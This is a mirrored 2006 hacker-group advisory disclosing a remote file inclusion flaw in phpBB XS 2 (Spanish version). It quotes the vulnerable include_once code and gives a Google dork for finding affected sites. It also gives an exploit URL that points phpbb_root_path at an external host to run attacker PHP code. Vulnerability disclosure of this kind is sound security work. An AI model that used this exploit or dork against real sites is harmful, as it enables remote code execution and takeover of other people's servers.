Security Advisory: SolpotCrew Advisory #14 - phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  lesvisit (visiteurs) <= v2.0 (lvc_include_dir)
Remote File Include Vulnerability
  Tagmin C.C 2.1.B Remote File Include
  PHP MyWebMin 1.0 Remote File Include
  phpsecurepages (cfgProgDir) Remote File Include Vulnerability

From: chris_hasibuan_(at)_yahoo.com <chris_hasibuan_(at)_yahoo.com>
Date: 29.09.2006
Subject: SolpotCrew Advisory #14 - phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion

#############################SolpotCrew Community################################
#
# phpBB XS 2 spain version (phpbb_root_path) Remote File Inclusion
#
# Download : http://www.elanzuelo.es/phpbb.tar.gz
#
#################################################################################

#
#
#       Bug Found By :Solpot a.k.a (k. Hasibuan) (28-09-2006)
#
#       contact: chris_hasibuan@yahoo.com
#
#       Website : http://www.nyubicrew.org/adv/solpot-adv-10.txt
#
################################################################################

#
#
#      Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid ,Noordin`M`TOP
#              robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
#              home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
#              Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
#              x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t
#              [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta
#              and all member solpotcrew community @ http://nyubicrew.org/forum/
#              especially thx to str0ke @ milw0rm.com
#
###############################################################################
Input passed to the "phpbb_root_path" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from includes/functions_kb.php

/***************************************************************************
*
*   This program is free software; you can redistribute it and/or modify
*   it under the terms of the GNU General Public License as published by
*   the Free Software Foundation; either version 2 of the License, or
*   (at your option) any later version.
*
*
***************************************************************************/

//
// get_quick_stats();
// gets number of articles
//

include_once($phpbb_root_path.'includes/functions_color_groups.'.
$phpEx);

function get_quick_stats()

Google Dork : "Traduccion Espanol por phpBB-Es"

Exploit : http://somehost/path_to_phpbbXS2/includes/functions_kb.php?phpbb_root_path=http:
//injek-pala-lappet?

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################